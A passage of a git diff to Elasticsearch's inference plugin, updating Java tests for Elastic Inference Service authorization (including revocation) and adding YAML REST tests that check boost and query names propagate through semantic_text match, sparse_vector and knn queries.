assertThat(models.get(2).getConfigurations().getInferenceEntityId(), is(".rainbow-sprinkles-elastic")); assertThat(models.get(3).getConfigurations().getInferenceEntityId(), is(".rerank-v1-elastic")); diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationHandlerTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationHandlerTests.java index d8c8c9e5b7abf..617ddef5a9910 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationHandlerTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationHandlerTests.java @@ -67,6 +67,78 @@ public void init() throws Exception { modelRegistry = getInstanceFromNode(ModelRegistry.class); } + public void testSecondAuthResultRevokesAuthorization() throws Exception { + var callbackCount = new AtomicInteger(0); + // we're only interested in two authorization calls, which is why the latch is initialized to 2 + var latch = new CountDownLatch(2); + final AtomicReference<ElasticInferenceServiceAuthorizationHandler> handlerRef = new AtomicReference<>(); + + Runnable callback = () -> { + // the first authorization response contains a streaming task, so we expect streaming to be supported here + if (callbackCount.incrementAndGet() == 1) { + assertThat(handlerRef.get().supportedTaskTypes(), is(EnumSet.of(TaskType.CHAT_COMPLETION))); + } + latch.countDown(); + + // we only want to run the tasks twice, so advance the time on the queue + // which flags the scheduled authorization request as ready to run + if (callbackCount.get() == 1) { + taskQueue.advanceTime(); + } else { + try { + handlerRef.get().close(); + } catch (IOException e) { + // ignore + } + } + }; + + var requestHandler = mockAuthorizationRequestHandler( + ElasticInferenceServiceAuthorizationModel.of( + new ElasticInferenceServiceAuthorizationResponseEntity( + List.of( + new ElasticInferenceServiceAuthorizationResponseEntity.AuthorizedModel( + "rainbow-sprinkles", + EnumSet.of(TaskType.CHAT_COMPLETION) + ) + ) + ) + ), + ElasticInferenceServiceAuthorizationModel.of(new ElasticInferenceServiceAuthorizationResponseEntity(List.of())) + ); + + handlerRef.set( + new ElasticInferenceServiceAuthorizationHandler( + createWithEmptySettings(taskQueue.getThreadPool()), + modelRegistry, + requestHandler, + initDefaultEndpoints(), + EnumSet.of(TaskType.SPARSE_EMBEDDING, TaskType.CHAT_COMPLETION), + null, + mock(Sender.class), + ElasticInferenceServiceSettingsTests.create(null, TimeValue.timeValueMillis(1), TimeValue.timeValueMillis(1), true), + callback + ) + ); + + var handler = handlerRef.get(); + handler.init(); + taskQueue.runAllRunnableTasks(); + latch.await(Utils.TIMEOUT.getSeconds(), TimeUnit.SECONDS); + + // at this point we've received both authorization responses; the second response revokes authorization + + assertThat(handler.supportedStreamingTasks(), is(EnumSet.noneOf(TaskType.class))); + assertThat(handler.defaultConfigIds(), is(List.of())); + assertThat(handler.supportedTaskTypes(), is(EnumSet.noneOf(TaskType.class))); + + PlainActionFuture<List<Model>> listener = new PlainActionFuture<>(); + handler.defaultConfigs(listener); + + var configs = listener.actionGet(); + assertThat(configs.size(), is(0)); + } + public void testSendsAnAuthorizationRequestTwice() throws Exception
{ var callbackCount = new AtomicInteger(0); // we're only interested in two authorization calls which is why I'm using a value of 2 here @@ -104,6 +176,10 @@ public void testSendsAnAuthorizationRequestTwice() throws Exception { ElasticInferenceServiceAuthorizationModel.of( new ElasticInferenceServiceAuthorizationResponseEntity( List.of( + new ElasticInferenceServiceAuthorizationResponseEntity.AuthorizedModel( + "abc", + EnumSet.of(TaskType.SPARSE_EMBEDDING) + ), new ElasticInferenceServiceAuthorizationResponseEntity.AuthorizedModel( "rainbow-sprinkles", EnumSet.of(TaskType.CHAT_COMPLETION) @@ -188,13 +264,13 @@ private static Map<String, DefaultModelConfig> initDefaultEndpoints() { ), MinimalServiceSettings.chatCompletion(ElasticInferenceService.NAME) ), - "elser-v2", + "elser-2", new DefaultModelConfig( new ElasticInferenceServiceSparseEmbeddingsModel( - defaultEndpointId("elser-v2"), + defaultEndpointId("elser-2"), TaskType.SPARSE_EMBEDDING, "test", - new ElasticInferenceServiceSparseEmbeddingsServiceSettings("elser-v2", null, null), + new ElasticInferenceServiceSparseEmbeddingsServiceSettings("elser-2", null, null), EmptyTaskSettings.INSTANCE, EmptySecretSettings.INSTANCE, ElasticInferenceServiceComponents.EMPTY_INSTANCE, diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationRequestHandlerTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationRequestHandlerTests.java index 1c19285ea8bf1..570e34370fc8a 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationRequestHandlerTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationRequestHandlerTests.java @@ -8,6 +8,7 @@ package org.elasticsearch.xpack.inference.services.elastic.authorization; import org.apache.logging.log4j.Logger; +import org.elasticsearch.ElasticsearchException; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.support.PlainActionFuture; import org.elasticsearch.common.settings.Settings; @@ -18,6 +19,7 @@ import org.elasticsearch.test.http.MockResponse; import org.elasticsearch.test.http.MockWebServer; import org.elasticsearch.threadpool.ThreadPool; +import org.elasticsearch.xcontent.XContentParseException; import org.elasticsearch.xpack.core.inference.results.ChatCompletionResults; import org.elasticsearch.xpack.inference.external.http.HttpClientManager; import org.elasticsearch.xpack.inference.external.http.sender.HttpRequestSender; @@ -38,13 +40,14 @@ import static org.elasticsearch.xpack.inference.Utils.mockClusterServiceEmpty; import static org.elasticsearch.xpack.inference.external.http.Utils.getUrl; import static org.elasticsearch.xpack.inference.external.http.retry.RetryingHttpSender.MAX_RETIES; +import static org.hamcrest.Matchers.containsString; +import static org.hamcrest.Matchers.instanceOf; import static org.hamcrest.Matchers.is; import static org.mockito.ArgumentMatchers.any; import static org.mockito.Mockito.doAnswer; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.times; import static org.mockito.Mockito.verify; -import static org.mockito.Mockito.verifyNoMoreInteractions; import static org.mockito.Mockito.when; public class ElasticInferenceServiceAuthorizationRequestHandlerTests extends
ESTestCase { @@ -135,22 +138,17 @@ public void testGetAuthorization_FailsWhenAnInvalidFieldIsFound() throws IOExcep PlainActionFuture<ElasticInferenceServiceAuthorizationModel> listener = new PlainActionFuture<>(); authHandler.getAuthorization(listener, sender); - var authResponse = listener.actionGet(TIMEOUT); - assertTrue(authResponse.getAuthorizedTaskTypes().isEmpty()); - assertTrue(authResponse.getAuthorizedModelIds().isEmpty()); - assertFalse(authResponse.isAuthorized()); + var exception = expectThrows(XContentParseException.class, () -> listener.actionGet(TIMEOUT)); + assertThat(exception.getMessage(), containsString("failed to parse field [models]")); - var loggerArgsCaptor = ArgumentCaptor.forClass(String.class); - verify(logger).warn(loggerArgsCaptor.capture()); - var message = loggerArgsCaptor.getValue(); - assertThat( - message, - is( - "Failed to retrieve the authorization information from the Elastic Inference Service." - + " Encountered an exception: org.elasticsearch.xcontent.XContentParseException: [4:28] " - + "[ElasticInferenceServiceAuthorizationResponseEntity] failed to parse field [models]" - ) - ); + var stringCaptor = ArgumentCaptor.forClass(String.class); + var exceptionCaptor = ArgumentCaptor.forClass(Exception.class); + verify(logger).warn(stringCaptor.capture(), exceptionCaptor.capture()); + var message = stringCaptor.getValue(); + assertThat(message, containsString("failed to parse field [models]")); + + var capturedException = exceptionCaptor.getValue(); + assertThat(capturedException, instanceOf(XContentParseException.class)); } } @@ -196,7 +194,6 @@ public void testGetAuthorization_ReturnsAValidResponse() throws IOException { var message = loggerArgsCaptor.getValue(); assertThat(message, is("Retrieving authorization information from the Elastic Inference Service.")); - verifyNoMoreInteractions(logger); } } @@ -230,7 +227,6 @@ public void testGetAuthorization_OnResponseCalledOnce() throws IOException { var message = loggerArgsCaptor.getValue(); assertThat(message, is("Retrieving authorization information from the Elastic Inference Service.")); - verifyNoMoreInteractions(logger); } } @@ -252,20 +248,14 @@ public void testGetAuthorization_InvalidResponse() throws IOException { PlainActionFuture<ElasticInferenceServiceAuthorizationModel> listener = new PlainActionFuture<>(); authHandler.getAuthorization(listener, sender); - var result = listener.actionGet(TIMEOUT); + var exception = expectThrows(ElasticsearchException.class, () -> listener.actionGet(TIMEOUT)); - assertThat(result, is(ElasticInferenceServiceAuthorizationModel.newDisabledService())); + assertThat(exception.getMessage(), containsString("Received an invalid response type from the Elastic Inference Service")); var loggerArgsCaptor = ArgumentCaptor.forClass(String.class); verify(logger).warn(loggerArgsCaptor.capture()); var message = loggerArgsCaptor.getValue(); - assertThat( - message, - is( - "Failed to retrieve the authorization information from the Elastic Inference Service."
- + " Received an invalid response type: ChatCompletionResults" - ) - ); + assertThat(message, containsString("Failed to retrieve the authorization information from the Elastic Inference Service.")); } } diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elasticsearch/ElserModelsTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elasticsearch/ElserModelsTests.java index fa0148ac69df5..d9ffddd62fb40 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elasticsearch/ElserModelsTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elasticsearch/ElserModelsTests.java @@ -19,21 +19,7 @@ public void testIsValidModel() { assertTrue(org.elasticsearch.xpack.inference.services.elasticsearch.ElserModels.isValidModel(randomElserModel())); } - public void testIsValidEisModel() { - assertTrue( - org.elasticsearch.xpack.inference.services.elasticsearch.ElserModels.isValidEisModel( - org.elasticsearch.xpack.inference.services.elasticsearch.ElserModels.ELSER_V2_MODEL - ) - ); - } - public void testIsInvalidModel() { assertFalse(org.elasticsearch.xpack.inference.services.elasticsearch.ElserModels.isValidModel("invalid")); } - - public void testIsInvalidEisModel() { - assertFalse( - org.elasticsearch.xpack.inference.services.elasticsearch.ElserModels.isValidEisModel(ElserModels.ELSER_V2_MODEL_LINUX_X86) - ); - } } diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerSchemaPayloadTestCase.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerSchemaPayloadTestCase.java index adffbb366fb02..90b5042d3dec4 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerSchemaPayloadTestCase.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerSchemaPayloadTestCase.java @@ -119,7 +119,7 @@ public final void testWithUnknownApiTaskSettings() { } } - public final void testUpdate() throws IOException { + public void testUpdate() throws IOException { var taskSettings = randomApiTaskSettings(); if (taskSettings != SageMakerStoredTaskSchema.NO_OP) { var otherTaskSettings = randomValueOtherThan(taskSettings, this::randomApiTaskSettings); diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticPayloadTestCase.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticPayloadTestCase.java index 65dcd62bb149a..9e4cfc52e9568 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticPayloadTestCase.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticPayloadTestCase.java @@ -18,8 +18,8 @@ import java.util.List; import java.util.Map; -import static org.hamcrest.Matchers.equalTo; -import static org.hamcrest.Matchers.is; +import static org.elasticsearch.xpack.inference.services.InferenceSettingsTestCase.toMap; +import static org.hamcrest.Matchers.containsString; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.when; @@ -50,6 +50,7 @@ protected SageMakerModel mockModel(SageMakerElasticTaskSettings taskSettings) { return model; } + 
@Override public void testApiTaskSettings() { { var validationException = new ValidationException(); @@ -67,14 +68,21 @@ public void testApiTaskSettings() { var validationException = new ValidationException(); var actualApiTaskSettings = payload.apiTaskSettings(Map.of("hello", "world"), validationException); assertTrue(actualApiTaskSettings.isEmpty()); - assertFalse(validationException.validationErrors().isEmpty()); - assertThat( - validationException.validationErrors().get(0), - is(equalTo("task_settings is only supported during the inference request and cannot be stored in the inference endpoint.")) - ); + assertTrue(validationException.validationErrors().isEmpty()); } } + @Override + public void testUpdate() { + var taskSettings = randomApiTaskSettings(); + var otherTaskSettings = randomValueOtherThan(taskSettings, this::randomApiTaskSettings); + var e = assertThrows(ValidationException.class, () -> taskSettings.updatedTaskSettings(toMap(otherTaskSettings))); + assertThat( + e.getMessage(), + containsString("task_settings is only supported during the inference request and cannot be stored in the inference endpoint") + ); + } + public void testRequestWithRequiredFields() throws Exception { var request = new SageMakerInferenceRequest(null, null, null, List.of("hello"), false, InputType.UNSPECIFIED); var sdkByes = payload.requestBytes(mockModel(), request); diff --git a/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/45_semantic_text_match.yml b/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/45_semantic_text_match.yml index 28093ba49e6cc..3898eb7de7c29 100644 --- a/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/45_semantic_text_match.yml +++ b/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/45_semantic_text_match.yml @@ -277,3 +277,126 @@ setup: query: "inference test" - match: { hits.total.value: 0 } + +--- +"Apply boost and query name on single index": + - requires: + cluster_features: "semantic_query_rewrite_interceptors.propagate_boost_and_query_name_fix" + reason: fix boosting and query name for semantic text match queries. 
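The cluster feature gating the YAML tests below, semantic_query_rewrite_interceptors.propagate_boost_and_query_name_fix, names the behavior they verify: when a match, sparse_vector, or knn query over a semantic_text field is rewritten by an interceptor, the original boost and _name must carry over to the rewritten query. In QueryBuilder terms the propagation amounts to something like this sketch (illustrative, not the interceptor's actual code):

import org.elasticsearch.index.query.QueryBuilder;

// Sketch: copy scoring/naming metadata from the intercepted query onto its
// rewrite, so boost multiplies the score and _name appears in matched_queries.
final class BoostAndNamePropagationSketch {
    static QueryBuilder propagate(QueryBuilder original, QueryBuilder rewritten) {
        rewritten.boost(original.boost());         // defaults to 1.0f when unset
        rewritten.queryName(original.queryName()); // null when no _name was given
        return rewritten;
    }
}

Without that copy, the rewritten query scores as if boost were 1.0 and matched_queries stays empty, which is exactly the regression the assertions below would catch.
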
+ + - skip: + features: [ "headers", "close_to" ] + + - do: + index: + index: test-sparse-index + id: doc_1 + body: + inference_field: [ "It was a beautiful game", "Very competitive" ] + non_inference_field: "non inference test" + refresh: true + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-sparse-index + body: + query: + match: + inference_field: + query: "soccer" + + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - close_to: { hits.hits.0._score: { value: 5.700229E18, error: 1e15 } } + - not_exists: hits.hits.0.matched_queries + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-sparse-index + body: + query: + match: + inference_field: + query: "soccer" + boost: 5.0 + _name: i-like-naming-my-queries + + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - close_to: { hits.hits.0._score: { value: 2.8501142E19, error: 1e16 } } + - match: { hits.hits.0.matched_queries: [ "i-like-naming-my-queries" ] } + +--- +"Apply boost and query name on multiple indices": + - requires: + cluster_features: "semantic_query_rewrite_interceptors.propagate_boost_and_query_name_fix" + reason: fix boosting and query name for semantic text match queries. + + - skip: + features: [ "headers", "close_to" ] + + - do: + index: + index: test-sparse-index + id: doc_1 + body: + inference_field: [ "It was a beautiful game", "Very competitive" ] + non_inference_field: "non inference test" + refresh: true + + - do: + index: + index: test-text-only-index + id: doc_2 + body: + inference_field: [ "It was a beautiful game", "Very competitive" ] + non_inference_field: "non inference test" + refresh: true + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-sparse-index,test-text-only-index + body: + query: + match: + inference_field: + query: "beautiful" + + - match: { hits.total.value: 2 } + - match: { hits.hits.0._id: "doc_1" } + - match: { hits.hits.1._id: "doc_2" } + - close_to: { hits.hits.0._score: { value: 1.1140361E19, error: 1e16 } } + - not_exists: hits.hits.0.matched_queries + - close_to: { hits.hits.1._score: { value: 0.2876821, error: 1e-4 } } + - not_exists: hits.hits.1.matched_queries + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-sparse-index,test-text-only-index + body: + query: + match: + inference_field: + query: "beautiful" + boost: 5.0 + _name: i-like-naming-my-queries + + - match: { hits.total.value: 2 } + - match: { hits.hits.0._id: "doc_1" } + - match: { hits.hits.1._id: "doc_2" } + - close_to: { hits.hits.0._score: { value: 5.5701804E19, error: 1e16 } } + - match: { hits.hits.0.matched_queries: [ "i-like-naming-my-queries" ] } + - close_to: { hits.hits.1._score: { value: 1.4384103, error: 1e-4 } } + - match: { hits.hits.1.matched_queries: [ "i-like-naming-my-queries" ] } diff --git a/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/46_semantic_text_sparse_vector.yml b/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/46_semantic_text_sparse_vector.yml index 
f1cff512fd209..cc67b9235f0b4 100644 --- a/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/46_semantic_text_sparse_vector.yml +++ b/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/46_semantic_text_sparse_vector.yml @@ -247,3 +247,100 @@ setup: - match: { hits.total.value: 2 } +--- +"Apply boost and query name on single index": + - requires: + cluster_features: "semantic_query_rewrite_interceptors.propagate_boost_and_query_name_fix" + reason: fix boosting and query name for semantic text sparse vector queries. + + - skip: + features: [ "headers", "close_to" ] + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-semantic-text-index + body: + query: + sparse_vector: + field: inference_field + query: "inference test" + + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - close_to: { hits.hits.0._score: { value: 3.7837332E17, error: 1e14 } } + - not_exists: hits.hits.0.matched_queries + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-semantic-text-index + body: + query: + sparse_vector: + field: inference_field + query: "inference test" + boost: 5.0 + _name: i-like-naming-my-queries + + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - close_to: { hits.hits.0._score: { value: 1.8918664E18, error: 1e15 } } + - match: { hits.hits.0.matched_queries: [ "i-like-naming-my-queries" ] } + +--- +"Apply boost and query name on multiple indices": + - requires: + cluster_features: "semantic_query_rewrite_interceptors.propagate_boost_and_query_name_fix" + reason: fix boosting and query name for semantic text sparse vector queries. 
+ + - skip: + features: [ "headers", "close_to" ] + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-semantic-text-index,test-sparse-vector-index + body: + query: + sparse_vector: + field: inference_field + query: "inference test" + inference_id: sparse-inference-id + + - match: { hits.total.value: 2 } + - match: { hits.hits.0._id: "doc_1" } + - match: { hits.hits.1._id: "doc_2" } + - close_to: { hits.hits.0._score: { value: 3.7837332E17, error: 1e14 } } + - not_exists: hits.hits.0.matched_queries + - close_to: { hits.hits.1._score: { value: 7.314424E8, error: 1e5 } } + - not_exists: hits.hits.1.matched_queries + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-semantic-text-index,test-sparse-vector-index + body: + query: + sparse_vector: + field: inference_field + query: "inference test" + inference_id: sparse-inference-id + boost: 5.0 + _name: i-like-naming-my-queries + + - match: { hits.total.value: 2 } + - match: { hits.hits.0._id: "doc_1" } + - match: { hits.hits.1._id: "doc_2" } + - close_to: { hits.hits.0._score: { value: 1.8918664E18, error: 1e15 } } + - match: { hits.hits.0.matched_queries: [ "i-like-naming-my-queries" ] } + - close_to: { hits.hits.1._score: { value: 3.657212E9, error: 1e6 } } + - match: { hits.hits.1.matched_queries: [ "i-like-naming-my-queries" ] } diff --git a/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/47_semantic_text_knn.yml b/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/47_semantic_text_knn.yml index 64ecb0f2d882c..d49e3a63848e3 100644 --- a/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/47_semantic_text_knn.yml +++ b/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/47_semantic_text_knn.yml @@ -404,4 +404,116 @@ setup: - match: { hits.total.value: 4 } +--- +"Apply boost and query name on single index": + - requires: + cluster_features: "semantic_query_rewrite_interceptors.propagate_boost_and_query_name_fix" + reason: fix boosting and query name for semantic text knn queries. 
+ + - skip: + features: [ "headers", "close_to" ] + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-semantic-text-index + body: + query: + knn: + field: inference_field + k: 2 + num_candidates: 100 + query_vector_builder: + text_embedding: + model_text: test + + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - close_to: { hits.hits.0._score: { value: 0.9990483, error: 1e-4 } } + - not_exists: hits.hits.0.matched_queries + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-semantic-text-index + body: + query: + knn: + field: inference_field + k: 2 + num_candidates: 100 + query_vector_builder: + text_embedding: + model_text: test + boost: 5.0 + _name: i-like-naming-my-queries + + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - close_to: { hits.hits.0._score: { value: 4.9952416, error: 1e-3 } } + - match: { hits.hits.0.matched_queries: [ "i-like-naming-my-queries" ] } +--- +"Apply boost and query name on multiple indices": + - requires: + cluster_features: "semantic_query_rewrite_interceptors.propagate_boost_and_query_name_fix" + reason: fix boosting and query name for semantic text knn queries. + + - skip: + features: [ "headers", "close_to" ] + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-semantic-text-index,test-dense-vector-index + body: + query: + knn: + field: inference_field + k: 2 + num_candidates: 100 + query_vector_builder: + text_embedding: + model_text: test + model_id: dense-inference-id + + - match: { hits.total.value: 2 } + - match: { hits.hits.0._id: "doc_1" } + - match: { hits.hits.1._id: "doc_3" } + - close_to: { hits.hits.0._score: { value: 0.9990483, error: 1e-4 } } + - not_exists: hits.hits.0.matched_queries + - close_to: { hits.hits.1._score: { value: 0.9439374, error: 1e-4 } } + - not_exists: hits.hits.1.matched_queries + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-semantic-text-index,test-dense-vector-index + body: + query: + knn: + field: inference_field + k: 2 + num_candidates: 100 + query_vector_builder: + text_embedding: + model_text: test + model_id: dense-inference-id + boost: 5.0 + _name: i-like-naming-my-queries + + - match: { hits.total.value: 2 } + - match: { hits.hits.0._id: "doc_1" } + - match: { hits.hits.1._id: "doc_3" } + - close_to: { hits.hits.0._score: { value: 4.9952416, error: 1e-3 } } + - match: { hits.hits.0.matched_queries: [ "i-like-naming-my-queries" ] } + - close_to: { hits.hits.1._score: { value: 4.719687, error: 1e-3 } } + - match: { hits.hits.1.matched_queries: [ "i-like-naming-my-queries" ] } diff --git a/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/90_semantic_text_highlighter.yml b/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/90_semantic_text_highlighter.yml index 021dfe320d78e..60dea800ca624 100644 --- a/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/90_semantic_text_highlighter.yml +++ 
b/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/90_semantic_text_highlighter.yml @@ -35,6 +35,23 @@ setup: } } + - do: + inference.put: + task_type: text_embedding + inference_id: dense-inference-id-compatible-with-bbq + body: > + { + "service": "text_embedding_test_service", + "service_settings": { + "model": "my_model", + "dimensions": 64, + "similarity": "cosine", + "api_key": "abc64" + }, + "task_settings": { + } + } + - do: indices.create: index: test-sparse-index @@ -70,7 +87,7 @@ setup: id: doc_1 body: title: "Elasticsearch" - body: ["ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!"] + body: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] refresh: true - do: @@ -89,14 +106,14 @@ setup: index: test-dense-index body: query: - match_all: {} + match_all: { } highlight: fields: - another_body: {} + another_body: { } - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } - - not_exists: hits.hits.0.highlight.another_body + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - not_exists: hits.hits.0.highlight.another_body --- "Highlighting using a sparse embedding model": @@ -114,10 +131,10 @@ setup: type: "semantic" number_of_fragments: 1 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 1 } - - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } - do: search: @@ -133,11 +150,11 @@ setup: type: "semantic" number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 2 } - - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } - - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" } - do: search: @@ -154,10 +171,10 @@ setup: order: "score" number_of_fragments: 1 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 1 } - - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." 
} + - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } - do: search: @@ -196,10 +213,10 @@ setup: type: "semantic" number_of_fragments: 1 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 1 } - - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } - do: search: @@ -215,11 +232,11 @@ setup: type: "semantic" number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 2 } - - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } - - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" } - do: search: @@ -236,10 +253,10 @@ setup: order: "score" number_of_fragments: 1 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 1 } - - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } - do: search: @@ -256,17 +273,17 @@ setup: order: "score" number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 2 } - - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } - - match: { hits.hits.0.highlight.body.1: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.1: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } --- "Default highlighter for fields": - requires: - cluster_features: "semantic_text.highlighter.default" - reason: semantic text field defaults to the semantic highlighter + cluster_features: "semantic_text.highlighter.default" + reason: semantic text field defaults to the semantic highlighter - do: search: @@ -281,11 +298,11 @@ setup: order: "score" number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: 